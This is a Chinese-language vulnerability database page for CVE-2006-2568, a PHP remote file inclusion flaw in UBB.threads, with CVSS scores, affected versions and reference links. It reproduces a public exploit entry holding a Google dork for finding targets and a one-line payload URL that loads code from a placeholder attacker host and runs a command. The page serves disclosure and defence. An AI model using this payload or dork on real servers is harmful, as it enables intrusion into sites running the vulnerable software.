CVE-2006-2568
CVSS5.1
发布时间 :2006-05-24 19:02:00
修订时间 :2011-03-07 21:36:31
NMCOE    

[原文]PHP remote file inclusion vulnerability in addpost_newpoll.php in UBB.threads 6.4 through 6.5.2 and 6.5.1.1 (trial) allows remote attackers to execute arbitrary PHP code via a URL in the thispath parameter.


[CNNVD]UBB.threads Addpost_newpoll.PHP 远程文件包含漏洞(CNNVD-200605-461)

        UBB.threads 6.4 到6.5.2和6.5.1.1 (试用版)的addpost_newpoll.php存在PHP远程文件包含漏洞。远程攻击者可以借助thispath参数中的URL执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ubbcentral:ubb.threads:6.4
cpe:/a:ubbcentral:ubb.threads:6.5
cpe:/a:ubbcentral:ubb.threads:6.4.4
cpe:/a:ubbcentral:ubb.threads:6.4.2
cpe:/a:ubbcentral:ubb.threads:6.4.3
cpe:/a:ubbcentral:ubb.threads:6.5.1.1
cpe:/a:ubbcentral:ubb.threads:6.5.2
cpe:/a:ubbcentral:ubb.threads:6.4.1
cpe:/a:ubbcentral:ubb.threads:6.5.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2568
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2568
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-461
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1915
(UNKNOWN)  VUPEN  ADV-2006-1915
http://secunia.com/advisories/20242
(VENDOR_ADVISORY)  SECUNIA  20242
http://milw0rm.com/exploits/1814
(UNKNOWN)  MILW0RM  1814
http://xforce.iss.net/xforce/xfdb/26596
(UNKNOWN)  XF  ubbthreads-thispath-file-include(26596)
http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/4560078/an/0/page/0#Post4560078
(UNKNOWN)  CONFIRM  http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/4560078/an/0/page/0#Post4560078
http://www.securityfocus.com/bid/18075
(UNKNOWN)  BID  18075
http://www.osvdb.org/25714
(UNKNOWN)  OSVDB  25714

- 漏洞信息

UBB.threads Addpost_newpoll.PHP 远程文件包含漏洞
中危 输入验证
2006-05-24 00:00:00 2006-05-25 00:00:00
远程  
        UBB.threads 6.4 到6.5.2和6.5.1.1 (试用版)的addpost_newpoll.php存在PHP远程文件包含漏洞。远程攻击者可以借助thispath参数中的URL执行任意PHP代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1814)

UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability (EDBID:1814)
php webapps
2006-05-22 Verified
0 V4mu
N/A [点击下载]
Anomaly 1n The System presents
UBB.threads >= 6.4.x Remote File Inclusion
 
founded by V4mu in 04/20/2006

URL: http://www.ubbcentral.com
Google dork: allinurl:"/ubbthreads/"

exploit:
/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
 
contact: irc.gigachat.net #A1TS

# milw0rm.com [2006-05-22]
		

- 漏洞信息

25714
UBB.threads addpost_newpoll.php thispath Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

UBB.threads contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to addpost_newpoll.php not properly sanitizing user input supplied to the 'thispath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-05-22 Unknow
2006-05-22 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站